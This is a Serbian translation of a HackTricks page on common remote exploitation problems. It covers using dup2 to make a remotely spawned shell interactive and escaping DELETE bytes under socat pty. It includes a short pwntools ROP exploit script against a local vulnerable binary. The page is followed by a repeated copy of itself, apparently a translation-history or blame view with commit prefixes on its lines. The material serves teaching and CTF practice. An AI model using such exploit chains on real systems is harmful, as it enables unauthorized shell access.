hacktricks/binary-exploitation/common-exploiting-problems.md

# Česti problemi eksploatacije

<details>

<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Da li radite u **kompaniji za kibernetičku bezbednost**? Želite li da vidite svoju **kompaniju reklamiranu na HackTricks**? ili želite pristupiti **najnovijoj verziji PEASS-a ili preuzeti HackTricks u PDF formatu**? Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Pridružite se** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** me na **Twitteru** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova** [**hacktricks repozitorijumu**](https://github.com/carlospolop/hacktricks) **i** [**hacktricks-cloud repozitorijumu**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## FD-ovi u udaljenoj eksploataciji

Kada se šalje eksploatacija na udaljeni server koji poziva **`system('/bin/sh')`** na primer, to će biti izvršeno u serverskom procesu, a `/bin/sh` će očekivati ulaz sa stdin (FD: `0`) i ispisivati izlaz na stdout i stderr (FD-ovi `1` i `2`). Zato napadač neće moći da interaguje sa shell-om.

Način da se ovo reši je pretpostaviti da je kada je server pokrenut, kreirao **FD broj `3`** (za osluškivanje) i da će zatim, vaša veza biti na **FD broju `4`**. Stoga je moguće koristiti sistemski poziv **`dup2`** da duplicira stdin (FD 0) i stdout (FD 1) u FD 4 (onaj koji pripada vezi napadača) kako bi bilo moguće kontaktirati shell nakon što se izvrši.

[**Primer eksploatacije odavde**](https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/exploit):
```python
from pwn import *

elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)

rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.win()

p.sendline(rop.chain())
p.recvuntil('Thanks!\x00')
p.interactive()
```
## Socat & pty

Imajte na umu da socat već prenosi **`stdin`** i **`stdout`** na socket. Međutim, `pty` režim **uključuje DELETE karaktere**. Dakle, ako pošaljete `\x7f` ( `DELETE` -) **obrišće prethodni karakter** vašeg eksploata.

Da biste zaobišli ovo, **bežični karakter `\x16` mora biti dodat na bilo koji `\x7f` koji se šalje.**

**Ovde možete** [**pronaći primer ovog ponašanja**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**.**

<details>

<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Da li radite u **kompaniji za kibernetičku bezbednost**? Želite li da vidite svoju **kompaniju reklamiranu na HackTricks**? ili želite da imate pristup **najnovijoj verziji PEASS-a ili preuzmete HackTricks u PDF-u**? Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Pridružite se** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili me **pratite** na **Twitteru** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**hacktricks repozitorijum**](https://github.com/carlospolop/hacktricks) **i** [**hacktricks-cloud repozitorijum**](https://github.com/carlospolop/hacktricks-cloud).

</details>
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`# Česti problemi eksploatacije`

			`<details>`

			`<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`

			`* Da li radite u kompaniji za kibernetičku bezbednost? Želite li da vidite svoju kompaniju reklamiranu na HackTricks? ili želite pristupiti najnovijoj verziji PEASS-a ili preuzeti HackTricks u PDF formatu? Proverite [PLANOVE ZA PRIJAVU](https://github.com/sponsors/carlospolop)!`
			`* Otkrijte [Porodicu PEASS](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [NFT-ova](https://opensea.io/collection/the-peass-family)`
			`* Nabavite [zvanični PEASS & HackTricks swag](https://peass.creator-spring.com)`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-04-07 04:42:46 +00:00			`* Pridružite se [💬](https://emojipedia.org/speech-balloon/) [Discord grupi](https://discord.gg/hRep4RUj7f) ili [telegram grupi](https://t.me/peass) ili pratite me na Twitteru 🐦[@carlospolopm](https://twitter.com/hacktricks\_live).`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`* Podelite svoje hakovanje trikove slanjem PR-ova [hacktricks repozitorijumu](https://github.com/carlospolop/hacktricks) i [hacktricks-cloud repozitorijumu](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`

			`## FD-ovi u udaljenoj eksploataciji`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-04-07 04:42:46 +00:00			Kada se šalje eksploatacija na udaljeni server koji poziva `system('/bin/sh')` na primer, to će biti izvršeno u serverskom procesu, a `/bin/sh` će očekivati ulaz sa stdin (FD: `0`) i ispisivati izlaz na stdout i stderr (FD-ovi `1` i `2`). Zato napadač neće moći da interaguje sa shell-om.
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00
			Način da se ovo reši je pretpostaviti da je kada je server pokrenut, kreirao FD broj `3` (za osluškivanje) i da će zatim, vaša veza biti na FD broju `4`. Stoga je moguće koristiti sistemski poziv `dup2` da duplicira stdin (FD 0) i stdout (FD 1) u FD 4 (onaj koji pripada vezi napadača) kako bi bilo moguće kontaktirati shell nakon što se izvrši.

			`[Primer eksploatacije odavde](https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/exploit):`
			```python
			`from pwn import *`

			`elf = context.binary = ELF('./vuln')`
			`p = remote('localhost', 9001)`

			`rop = ROP(elf)`
			`rop.raw('A' * 40)`
			`rop.dup2(4, 0)`
			`rop.dup2(4, 1)`
			`rop.win()`

			`p.sendline(rop.chain())`
			`p.recvuntil('Thanks!\x00')`
			`p.interactive()`
			```
			`## Socat & pty`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-04-07 04:42:46 +00:00			Imajte na umu da socat već prenosi `stdin` i `stdout` na socket. Međutim, `pty` režim uključuje DELETE karaktere. Dakle, ako pošaljete `\x7f` ( `DELETE` -) obrišće prethodni karakter vašeg eksploata.
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00
			Da biste zaobišli ovo, bežični karakter `\x16` mora biti dodat na bilo koji `\x7f` koji se šalje.

			`Ovde možete [pronaći primer ovog ponašanja](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit).`

			`<details>`

			`<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-04-07 04:42:46 +00:00			`* Da li radite u kompaniji za kibernetičku bezbednost? Želite li da vidite svoju kompaniju reklamiranu na HackTricks? ili želite da imate pristup najnovijoj verziji PEASS-a ili preuzmete HackTricks u PDF-u? Proverite [PLANOVE ZA PRIJAVU](https://github.com/sponsors/carlospolop)!`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`* Otkrijte [Porodicu PEASS](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [NFT-ova](https://opensea.io/collection/the-peass-family)`
			`* Nabavite [zvanični PEASS & HackTricks swag](https://peass.creator-spring.com)`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-04-07 04:42:46 +00:00			`* Pridružite se [💬](https://emojipedia.org/speech-balloon/) [Discord grupi](https://discord.gg/hRep4RUj7f) ili [telegram grupi](https://t.me/peass) ili me pratite na Twitteru 🐦[@carlospolopm](https://twitter.com/hacktricks\_live).`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`* Podelite svoje hakovanje trikove slanjem PR-ova na [hacktricks repozitorijum](https://github.com/carlospolop/hacktricks) i [hacktricks-cloud repozitorijum](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`